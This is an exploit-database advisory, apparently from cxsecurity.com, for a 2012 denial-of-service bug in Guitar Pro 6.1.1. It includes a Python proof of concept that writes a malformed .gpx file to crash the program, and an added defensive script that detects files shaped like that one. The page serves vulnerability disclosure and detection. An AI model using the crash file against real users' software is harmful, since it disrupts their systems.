Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit

2012-05-06 / 2012-11-28
Credit: condis
Risk: Low
Local: Yes
Remote: No
CWE: CWE-400


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python
# ---------------------------------------------------------
# Guitar Pro 6.1.1 r10791 (.gpx) Denial of Service Exploit
# found by condis
#
# Date : 01 May 2012 AD
# Tested on : Windows XP Professional SP3 PL
#
# Download : http://www.guitar-pro.com/en/index.php
# Price : ~60 euro
#
# Description :
#
# Each load of malformed file into the program ends up
# with crash, but place of crash and registers values
# differ every time o_O"
#
# In my opinion, this bug does not allow for anything else
# except getting to a DoS situation, therefore no further
# research was done.
# ---------------------------------------------------------

evil = "BCFZ\x04\x10\x01\x00"
evil += "A" * 953

file = open('ogonek_and_cooh_-_not_my_type.gpx', 'w')
file.write(evil)
file.close()

print "Sex, drugs & drum'n'bass!"
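A defensive triage check built from the byte layout of the file written above, added here as an example and not part of the original advisory: it flags files that start with the same BCFZ magic and carry a near-constant body like the PoC's filler. The entropy threshold, the read cap, the result labels and the assumption that legitimate file bodies are not near-constant byte runs are assumptions of this example; the sample inputs are constructed.

```python
import math
from collections import Counter

MAGIC = b"BCFZ"        # magic bytes the PoC on this page starts with
PREFIX_LEN = 8         # magic plus the 4 bytes the PoC writes after it
ENTROPY_FLOOR = 1.0    # assumed threshold, in bits per byte
READ_CAP = 1 << 20     # assumed cap: inspect at most 1 MiB per file


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of data in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total)
                for n in Counter(data).values())


def triage_gpx(blob: bytes) -> str:
    """Return 'not-bcfz', 'truncated', 'suspicious' or 'no-match'."""
    if not blob.startswith(MAGIC):
        return "not-bcfz"
    body = blob[PREFIX_LEN:]
    if not body:
        # Magic present but nothing after the 8-byte prefix.
        return "truncated"
    # A body that is one repeated byte (or nearly so) matches the
    # shape of the PoC's filler: "A" * 953.
    if shannon_entropy(body) < ENTROPY_FLOOR:
        return "suspicious"
    # Only means the filler heuristic did not fire, not that the file is safe.
    return "no-match"


def triage_file(path: str) -> str:
    """Apply triage_gpx to the first READ_CAP bytes of a file on disk."""
    with open(path, "rb") as handle:
        return triage_gpx(handle.read(READ_CAP))


# Constructed samples: one shaped like the PoC output, one with a varied body.
POC_SHAPED = b"BCFZ\x04\x10\x01\x00" + b"A" * 953
VARIED = b"BCFZ\x04\x10\x01\x00" + bytes(range(256)) * 4

if __name__ == "__main__":
    for name, sample in (("poc-shaped", POC_SHAPED), ("varied", VARIED)):
        print(name, triage_gpx(sample))
```
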

References:

http://www.guitar-pro.com/en/index.php
http://cond.psychodela.pl


Copyright 2020, cxsecurity.com